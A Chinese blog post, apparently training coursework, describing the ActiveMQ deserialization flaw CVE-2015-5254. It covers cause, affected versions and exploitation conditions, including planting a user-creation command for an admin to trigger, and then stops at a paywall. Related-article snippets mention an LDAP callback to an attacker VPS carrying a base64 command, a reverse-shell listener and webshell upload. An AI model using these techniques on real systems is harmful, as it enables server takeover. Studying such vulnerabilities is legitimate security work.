阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)

网安大队长阿一

已于 2024-05-24 14:54:24 修改

阅读量926

点赞数 16

文章标签： web安全 activemq 安全

于 2024-05-24 11:20:45 首次发布

本文链接：https://blog.youkuaiyun.com/Ayixy/article/details/139169960

版权

⼀、漏洞描述

Apache ActiveMQ 是由美国阿帕奇（Apache）软件基⾦会开发的开源消息中间件，⽀持 Java 消息服

务、集群、Spring 框架等。属于消息队列组件(消息队列组件：分布式系统中的重要组件，主要解决应⽤

耦合、异步消息、流量削峰等)。

⼆、漏洞成因

Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞，该程序引起的漏洞不限制代理中可以序列化的

类。远程攻击者可以制作⼀个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象，利⽤该漏洞执

⾏任意代码。

三、影响版本

Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

四、利⽤限制

1.版本符合

2.⽴即执⾏代码：能够通过弱密码登录查看消息队列

3.没有查看队列所有消息的⽤户名和密码下，只能管理员/⽤户去点击我们插⼊的消息才能触发（⽐较鸡

肋，但可以写⼊创建⽤户命令等待管理员点击查看，概率很⼤！）

java要求：jdk1.8

安装教程： https://blog.youkuaiyun.com/Deadly_97/article/details/111657908

压缩包安装

java1.8环境配置

vim /stc/profile

命令⾏

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

网安大队长阿一

关注关注

16
点赞
踩
16

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ActiveMQ 反序列化漏洞复现(CVE-2015-5254)

m0_59839948的博客

09-05

1747

广东东软学院的学生，web安全技术漏洞复现可以参考

阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194)

Ayixy的博客

05-24

890

2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统，Kafka 可以处理⼤量的消息和数据流，具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar：监听，可反弹shell。的特点，⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞，可通过该漏洞在服务器端任意执⾏代码，写⼊后⻔，获取服务器权限，进⽽控制整个。

参与评论您还未登录，请先登录后发表或查看评论

ActiveMQ 反序列化漏洞（CVE-2015-5254）

The code way of kinnisoy

10-24

2105

ActiveMQ 反序列化漏洞（CVE-2015-5254）

Apache ActiveMQ漏洞历史整合复现

最新发布

HLi1219的博客

03-20

615

编写一个python脚本，需要远程加载poc.xml进行利用，因此需要在poc所在目录利用python搭建一个简易的http服务。由于fileserver不能上传jsp文件，因此先上传webshell.txt文件，后续利用MOVE转移到能执行的目录。MOVE转移到/opt/activemq/webapps/api/路径下，并修改文件后缀为可利用后缀。运行exploit.py，输入目标ip和端口，以及搭建的简易http服务链接。post到/api/jolokia/返回200，漏洞可利用。

ActiveMQ 反序列化RCE漏洞（CVE-2023-46604）

zneVue

07-17

1398

在Apache ActiveMQ 5.18.2版本及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型，导致代理的类路径上的任何类实例化，从而执行任意命令。

ActiveMQ 反序列化漏洞 (CVE-2015-5254)

m0_74402888的博客

04-30

1467

1.在IDEA中建立好了SpringBoot项目，并配置好了docker容器，然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口，消息在这个端口上传递；

【阿一网络安全】MinI O SSRF （ CVE-2021-21287）

Ayixy的博客

07-10

777

攻击者可以滥⽤服务器上的功能来读。中存在服务器端请求伪造漏洞。攻击者通过提供完全不同的。的构建⽅式（路径遍历等）⽬标应⽤程序可能具有从。或以其他⽅式从可篡改的。下发布的⾼性能对象存。来修改对此功能的调⽤。

阿一网络安全之log4j2漏洞CVE-2021-44228复现

Ayixy的博客

08-23

404

漏洞简介Apache Log4j 2 是对 Log4j 的升级，它⽐其前身 Log4j 1.x 提供了显着改进，并提供了 Logback 中可⽤的许多改进，同时修复了 Logback 架构中的⼀些固有问题。2021 年 12 ⽉，在 Apache Log4j2 中发现了⼀个 0-day 漏洞。Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

阿一网络安全学院实战练习——Θ socat搭建正向代理数据库服务

Ayixy的博客

07-15

296

将本地端口的数据流转发到远程服务器或从远程服务器接收数据。，用于在两个数据流之间建立双向数据传输。：可以编写脚本来自动化复杂的网络操。：支持多种数据传输协议和格式。：用于网络服务的测试和调试。，可以模拟客户端和服务器。）是一个多功能的网络工具。、测试和其他多种用途。，但作用于网络连接。和格式之间进行转换。命令将本地端口流量转。，且都开启了远程连接。

ActiveMQ反序列化漏洞（CVE-2015-5254）

Kevin's Blog

06-02

1897

文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现一、介绍 1.1 简介 Apache的一款JAVA开源消息中间件，支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。消息队列组件：分布式系统中的重要组件，主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因漏洞没有限制在代理

【CVE】CVE-2015-5254：ActiveMQ 反序列化漏洞利用

边扯边淡

03-15

1950

起序：复现不难，就是需要好好的准备好靶场环境。一、靶场环境使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub：https://github.com/vulhub/vulhub 1、漏洞：反序列化漏洞该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .

ActiveMQ反序列化漏洞（CVE-2015-5254）复现

weixin_30784141的博客

11-16

207

0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMes...

ActiveMQ未授权访问漏洞

starhei.zxy的博客

08-05

265

ActiveMQ是一款流行的开源消息服务器。默认情况下，ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄露。步骤二：ActiveMQ默认使用8161端口，默认用户名和密码是。步骤一：使用以下Fofa语法搜索产品...，在打开的页面输入....

ActiveMQ反序列化漏洞原理+复现

ChenD的学习笔记

03-09

2468

ActiveMQ通过消息队列来实现信息传递，每个消息要保证发出端和接收端格式相同，其中使用了序列化的方法进行传递，在这个过程中没有限制可在代理中序列化的类，这时候我们就可以自己构造一份序列化的恶意代码payload，将其作为事件发到ActiveMQ服务上，在管理员在后台管理时触发了payload，或者攻击者使用弱口令拿到ActiveMQ的账户，并执行了payload，则可以成功利用该漏洞。消息队列，服务器A将客户发起的请求放入服务器B的消息队列中，服务器B从消息队列中取出并处理。

【漏洞复现】---- ActiveMQ 反序列化漏洞（CVE-2015-5254）

qq_43168364的博客

09-04

764

一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。漏洞影响的版本为：Apache ActiveMQ 5.13.0之前的版本。二、漏洞环境准备 pull下来内容环境运行后，将监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递

亲测GreenPlum-4.3.22.0数据库安装包下载

知识点一：GreenPlum数据库概述 GreenPlum是一个开源的大规模并行处理（MPP）数据库，它特别适合于数据仓库和大数据分析的应用场景。MPP架构允许GreenPlum数据库在多台服务器上同时处理大量数据，相比传统的关系...